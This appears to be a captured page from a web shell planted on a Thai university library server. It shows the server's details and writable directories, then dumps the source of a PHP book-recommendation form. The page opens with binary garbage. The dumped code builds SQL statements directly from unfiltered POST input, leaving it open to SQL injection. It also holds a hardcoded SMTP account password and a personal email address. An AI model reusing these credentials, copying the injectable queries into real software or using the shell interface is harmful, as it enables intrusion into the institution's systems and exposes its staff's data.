h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/arit/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/arit/IntroForm_EditSubmit-2022-02-24.php
<? session_start();	 	
include "IntroForm_Check.php";?>
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">

<link rel="shortcut icon" href="images/logotab.ico">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head>

 <!-- เลือกวันที่-->
<link type="text/css" href="calendar2/flora.calendars.picker.css" rel="stylesheet"/>
<script type="text/javascript" src="js/jquery.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.plus.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.picker.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.thai.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.thai-th.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.picker-th.js"></script>
<script type="text/javascript">
$(function() {
    $('#mydate').calendarsPicker({calendar: $.calendars.instance('thai','th')});
});
</script>
        <link href="structer.css" rel="stylesheet" type="text/css">



 <!-- คณะและสาขาวิชา่-->
<script language="javascript">
menu = new Array();
menu[-1] = new Array(0, "ไม่มีข้อมูล");
menu[1] = new Array( 101, "การศึกษาปฐมวัย", 102, "สังคมศาตร์", 103, "ภาษาไทย",104,"ภาษาอังกฤษ",105,"คณิตศาสตร์",106,"วิทยาศาสตร์ทั่วไป");
menu[2] = new Array(201, "พัฒนาชุมชน", 202, "ภาษาอังกฤษ",203,"รัฐประศาสนศาสตร์",204,"ภาษาไทย",205,"การจัดการทางวัฒนธรรม",206,"สังคมศาสตร์เพื่อมัคคุเทศก์");
menu[3] = new Array(301, "อุตสาหกรรมท่องเที่ยว", 302, "บริหารทรัพยากรมนุษย์",303,"การจัดการ",304,"การตลาด",305,"คอมพิวเตอร์ธุรกิจ",306,"เศรษฐศาสตร์ ",307,"นิเทศศาสตร์ ");
menu[4] = new Array(401, "การเพาะเลี้ยงสัตว์น้ำ", 402, "เกษตรศาสตร์",403,"วิทยาศาสตร์และเทคโนโลยีการอาหาร");//ถ้าเพิ่ม สาขาก็เพิ่มmenu[4]
menu[5] = new Array(501, "วิศวกรรมการจัดการ", 502, "เทคโนโลยีอุตสาหกรรม (ต่อเนื่อง)");
menu[6] = new Array(601, "การแพทย์แผนไทยประยุกต์", 602, "สาธารณสุขศาสตร์",603,"ฟิสิกส์",604,"เคมี",605,"ชีววิทยา",606,"เทคโนโลยียางและพอลิเมอร์",607,"เทคโนโลยีสารสนเทศ",608,"วิทยาการคอมพิวเตอร์",609,"วิทยาศาสตร์สิ่งแวดล้อม",610,"คหกรรมศาสตร์",611,"ชีววิทยาประยุกต์",612,"คณิตศาสตร์และสถิติ");
menu[7] = new Array(701, "ออกแบบประยุกต์ศิลป์", 702, "นาฏยรังสรรค์",703,"ดนตรีสากล",704,"ดนตรีไทย",705,"ทัศนศิลป์");
menu[8] = new Array(801, "หลักสูตรและการสอน", 802, "การบริหารการศึกษา",803,"ยุทธศาสตร์การพัฒนา",804,"วิทยาศาสตร์ศึกษา",805,"สาธารณสุขชุมชน",806,"การจัดการเทคโนโลยีการเกษตร",807,"การบริหารธุรกิจ");


function showSubMenu(i)//อันนี้ไม่ต้องแก้
{
box = document.f1.Branch;
i++;
while(box.options.length) box.options[0] = null;
c = 0;
for(m = 0; m < menu[i-1].length/2; m++) {
if((document.f1.action.value == "post") && (menu[i-1][m*2] >= 0)) {
box.options[c++] = new Option(menu[i-1][m*2+1], menu[i-1][m*2]);
}
else {
box.options[c++] = new Option(menu[i-1][m*2+1], menu[i-1][m*2]);
}
}
}
</script>		
		

<script language="JavaScript"> // ตรวจสอบข้อมูลก่อนเพิ่ม
function checkFields2() {
missinginfo = "";
if (document.f1.Title.value == "") { 
missinginfo += "\n - * สังกัด/คณะ";
}
if (document.f1.keyword.value == "") { 
missinginfo += "\n - * ชื่อ";
}
if (document.f1.Lname.value == "") { 
missinginfo += "\n - * สกุล";
}

if (missinginfo != "") {
missinginfo ="_____________________________\n" +
"กรุณากรอกข้อมูลต่อไปนี้ :\n" +
missinginfo + "\n_____________________________" +
"\nกรุณากลับไปกรอกอีกครั้ง ";
alert(missinginfo);
return false;
}
else return true;
}
</script>

<title>ยืนยันการแ้ก้ไขข้อมูล</title>

</head>
<style type="text/css">
.news_content
{
	width:750px;
	float:right;
}

.news_menu
{
	width:200px;
	float:left;
	height:800px;
}

.sidebar_menu {
	list-style: none;
	margin: 0 0 30px;
	padding: 0;
}
.sidebar_menu li {
	margin: 0;
	padding: 2px 0 3px 16px;
	background: url(./images/templatemo_list_01.png) no-repeat scroll 0 8px;
	border-bottom: 1px dotted #ccc
}

.sidebar_menu li a {
	font-size: 14px;
}

#sidebar h3 {
	font-size: 16px;
	padding: 0 0 15px 0;
	margin: 0 0 15px 0;
	background: url(./images/sidebar_header_bg.png)  left bottom no-repeat
}


h1 {
	margin: 0 0 5px 0;
	padding: 10px 0 10px 10px;
	font-size: 24px;
	font-weight: normal;
	color: #ffffff;
	background: #26405b;
}

h2 {
	margin: 0 0 10px 0;
	padding: 5px 0 5px 10px;
	font-size: 16px;
}


h4 {
	margin: 0;
	padding: 3px 0 3px 10px;
	font-size: 18px;
	font-weight: bold;
	color: #03F;
	background: #EEE;
}


 .section_02_box {
	 
	float: left;
	width: 350px;
	border: 1px solid #CCCCCC;
	margin: 0 20px 0 0px;
}

.section_02_box .section_02_box_content{
	float: left;
	padding: 15px;
}

.section_02_box_content .section_02_box_content_title {
	font-weight: bold;
}

.section_02_box_content ul{
	clear: both;
	list-style: none;
	margin: 0;
	padding: 0;
}

.section_02_box_content ul li{
	padding: 0 0 5px 15px;
	margin: 0;	
	background: url(images/templatemo_listicon.gif) top left no-repeat;
}

.section_02_box img {
	float: left;
	margin: 3px 15px 0 0;
}
.cleaner_with_height {
	clear: both;
	width: 100%;
	height: 20px;
}

.style1 {color: #0000FF}
</style>



</head>


  <body>
	<!--start logo -->
	<div id="logo">
           		 <?  include "logo.php";?>
    </div>
    <!--end logo -->


  
	<!-- start nav -->
	<nav>
    	<div id="nav">
        	<div id="content-nav">
           		 <?  include "navigator.php";?>
            </div>
        </div>
       
    </nav>

    
    
	<!-- start article -->
    <article>
    
    	<div id="content"> 	<!-- start content -->
        
        	<div class="content-title">
            แบบฟอร์มแนะนำทรัพยากรเข้าห้องสมุด <img src="images/dot21.jpg" width="12px;"> 
              <div class="content-line"></div>
          </div>

			<div class="content-text">
                
                
	
                
                            	 <div class="news_menu">
            
        
                    <ul class="sidebar_menu">
                        <li><a href="IntroForm_Index.php">แบบฟอร์มออนไลน์</a></li>				
                        <li><a href="IntroForm_Search.php">ค้นหาข้อมูล</a></li>				
        <?

									include('IntroForm_Authen.php');
									if(empty($numrows))
									{
		?>
                      			  <li><a href="IntroForm_login.php">เข้าระบบ</a></li>
                        
        <? 
									$chang="";
									}
									else
									{
										
		?>								
									  <li><a href="IntroForm_logout.php">ออกจากระบบ</a></li>
        <?                              

									
									}
						
		?>
                        
                        
                    </ul>
           
           		</div>	
                
                
                
              <div class="news_content">
				
			  

<? 

include "connect_intro_resource.php";

$page=$_POST[page];
$keyword=$_POST[keyword];
$OrderType=$_POST[OrderType];

$IntroID=$_POST[IntroID];
$Fname=$_POST[Fname];
$Lname=$_POST[Lname];
$Depart=$_POST[Depart];
$MailUser=$_POST[MailUser];
$Tel=$_POST[Tel];
$pre=$_POST[pre];
						$SourceType=$_POST[SourceType];
						$SourceStatus=$_POST[SourceStatus];
						$Publisher=$_POST[Publisher];
						$Title=$_POST[Title];
						$Author=$_POST[Author];
						$Edition=$_POST[Edition];
						$Year=$_POST[Year];
						$NumWant=$_POST[NumWant]; 
						$Price=$_POST[Price]; 
						$CallNumber=$_POST[CallNumber]; 
						$double=$_POST[double]; 
						$ISBN=$_POST[ISBN]; 
						$date=date("Y:m:d");
						$Title = addslashes ($Title);
						$Author = addslashes ($Author);


$query=mysql_query("select * from user where Fname = '$Fname' and Lname='$Lname' ");
$row=mysql_num_rows($query);


		if (empty($row))
		{
				include "connect_intro_resource.php";

				$MailUser=$_POST[MailUser];
				$Tel=$_POST[Tel];
				$Depart=$_POST[Depart];
				
					mysql_query ("INSERT INTO  `intro_resource`.`user` (
				`Pre` ,
				`Fname` ,
				`Lname` ,
				`Depart` ,
				`MailUser` ,
				`Tel` 
				)
				VALUES (
				 '$pre','$Fname', '$Lname' ,'$Depart','$MailUser','$Tel'
				);
				")or die ("ไม่สามารถเพิ่มข้อมูลได้ค่ะ1");
						echo "<br/>เพิ่มข้อมูลเรียบร้อยแล้ว";
							
		}
		echo "introid='$IntroID' -- StatusType= '$StatusType' --SourceType= '$SourceType' ";
			include "connect_intro_resource.php";

			if (!empty($Depart)) 
			{
			mysql_query("update user set Depart='$Depart' where Fname = '$Fname' and Lname='$Lname'");
			}
			if (!empty($MailUser)) 
			{
			mysql_query("update user set MailUser='$MailUser' where Fname = '$Fname' and Lname='$Lname' ");
			}
			if (!empty($Tel)) 
			{
			mysql_query("update user set Tel='$Tel' where Fname = '$Fname' and Lname='$Lname'");
			}
			if (!empty($pre)) 
			{
			mysql_query("update user set Pre='$pre' where Fname = '$Fname' and Lname='$Lname'");
			}
		
		
		
			mysql_query("UPDATE `intro_resource`.`introdetail` SET `Fname` = '$Fname', `Lname` = '$Lname', `SourceType` = '$SourceType', `Title` = '$Title', `Author` = '$Author', `Publisher` = '$Publisher', `PulbilshYear` = '$Year', `Edition` = $Edition, `ISBN` = '$ISBN', `Price` = $Price, `NumWant` = $NumWant, `SourceStatus` = '$SourceStatus',  `CallNumber` = '$CallNumber' WHERE `introdetail`.`IntroID` = $IntroID;")or die ("ไม่สามารถแก้ไขข้อมูลได้ค่ะ22");
						echo "<br>แก้ไขข้อมูลแล้ว <br/>  ";
						
/*		
		
			mysql_query("update  introdetail  SET  
						`Fname` =  '$Fname',
						`Lname` =  '$Lname',
						`SourceType` =  '$SourceType',
						`Title` =  '$Title',
						`Author` =  '$Author',
						`Publisher` =  '$Publisher',
						`PulbilshYear` =  '$Year',
						`Edition` =  '$Edition',
						`ISBN` =  '$ISBN',
						`Price` =  '$Price',
						`NumWant` =  '$NumWant',
						`SourceStatus` =  '$StatusType' ,
						`CallNumber` =  '$CallNumber' 
					
						WHERE `IntroID` ='$IntroID'")
						or die ("ไม่สามารถแก้ไขข้อมูลได้ค่ะ");
						echo "<br>แก้ไขข้อมูลแล้ว <br/>  ";
						
						
	*/
	
	
if (!empty($_POST[sendmail]))
{
	if (!empty($MailUser))
	{
		$query2=mysql_query("select * from statustype where StatusTypeID = $SourceStatus");
		$arr2=mysql_fetch_array($query2);
		$StatusTypeName=$arr2[StatusTypeName];


	require_once('mailer/class.phpmailer.php');
	$mail = new PHPMailer();
	$mail->IsHTML(true);
	$mail->IsSMTP();
	$mail->SMTPAuth = true; // enable SMTP authentication
	$mail->SMTPSecure = "ssl"; // sets the prefix to the servier
	$mail->Host = "smtp.gmail.com"; // sets GMAIL as the SMTP server
	$mail->Port = 465; // set the SMTP port for the GMAIL server
	$mail->Username = "circulation@skru.ac.th"; // GMAIL username
	$mail->Password = "cirarit@skru"; // GMAIL password
	$mail->From = "circulation@skru.ac.th"; // "name@yourdomain.com";
	//$mail->AddReplyTo = "support@thaicreate.com"; // Reply
	//$mail->FromName = "สำนักวิทยบริการฯ ม.ราชภัฏสงขลา";  // set from Name
	$mail->FromName = "=?utf-8?B?".base64_encode("สำนักวิทยบริการฯ ม.ราชภัฏสงขลา")."?=";
	//$mail->Subject = "แจ้งสถานะรายการหนังสือที่ท่านแนะนำเข้าห้องสมุด"; 
	$mail->Subject    =  "=?utf-8?B?".base64_encode("แจ้งสถานะรายการหนังสือที่ท่านแนะนำเข้าห้องสมุด")."?=";
	$mail->Body = "แจ้งสถานะรายการหนังสือ  <br/>ชื่อหนังสือ :: $Title <br/>  ผู้แต่ง :: $Author <br/> สถานะ :: $StatusTypeName ";

	//$mail->AddAddress("kobsak.na@skru.ac.th", "Mr.Adisorn Boonsong"); // to Address
	$address = $MailUser;
	$mail->AddAddress($address, "sending ");	

	//$mail->AddAttachment("thaicreate/myfile.zip");
	//$mail->AddAttachment("thaicreate/myfile2.zip");

	$mail->AddCC("raisupit@hotmail.com", "=?utf-8?B?".base64_encode("สุพิศ ศิริรัตน์")."?="); //CC
	//$mail->AddBCC("member@thaicreate.com", "Mr.Member ShotDev"); //CC

	$mail->set('X-Priority', '1'); //Priority 1 = High, 3 = Normal, 5 = low

	$mail->Send(); 
	echo "send..."; 




		//require_once('mailer/class.phpmailer.php');
		////include("class.smtp.php"); // optional, gets called from within class.phpmailer.php if not already loaded
		
		//$mail             = new PHPMailer();
		
		//$body             = "แจ้งสถานะรายการหนังสือ  <br/>ชื่อหนังสือ :: $Title <br/>  ผู้แต่ง :: $Author <br/> สถานะ :: $StatusTypeName ";
		////$body             = eregi_replace("[\]",'',$body);
		
		//$mail->IsSMTP(); // telling the class to use SMTP
		//$mail->Host       = "smtp.gmail.com"; // SMTP server
		//$mail->SMTPDebug  = 2;                     // enables SMTP debug information (for testing)
												   // 1 = errors and messages
												   // 2 = messages only
		//$mail->SMTPAuth   = true;                  // enable SMTP authentication
		//$mail->Host       = "smtp.gmail.com"; // sets the SMTP server
		//$mail->Port       = 465;                    // set the SMTP port for the GMAIL server
		//$mail->Username   = "circulation@skru.ac.th"; // SMTP account username
		//$mail->Password   = "cirarit@skru";        // SMTP account password
		
		//$mail->SetFrom('circulation@skru.ac.th');
		
		////$mail->AddReplyTo("name@yourdomain.com","First Last");
		
		//$mail->Subject    =  "=?utf-8?B?".base64_encode("แจ้งสถานะรายการหนังสือที่ท่านแนะนำเข้าห้องสมุด")."?=";
		
		////$mail->AltBody    = "To view the message, please use an HTML compatible email viewer!"; // optional, comment out and test
		
		//$mail->MsgHTML($body);
		
		//$address = $MailUser;
		//$mail->AddAddress($address, "sending ");
		
		//$mail->AddAttachment("images/phpmailer.gif");      // attachment
		//$mail->AddAttachment("images/phpmailer_mini.gif"); // attachment
		
		//if(!$mail->Send()) {
		//  echo "Mailer Error: " . $mail->ErrorInfo;
		//} else {
		//  echo "ส่งเมล์เรียบร้อยแล้ว";
		//}
	}
	else
	{
	echo "<br>ไม่สามารถส่งเมล์ได้ เนื่องจาก ผู้ใช้ไม่มีอีเมล์";
	}

}

echo"<br/>กำลังกลับไปหน้าเดิม....<meta http-equiv='refresh' content='3;URL=IntroForm_Admin2.php?page=$page&keyword=$keyword&OrderType=$OrderType'> ";					
				
?>


		


              </div> <!-- end news_content -->

         </div> <!-- end content-text -->

       
       
       </div>     	<!-- end content -->
  
    </article>




<footer>
<? include "footer.php";?>
</footer>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit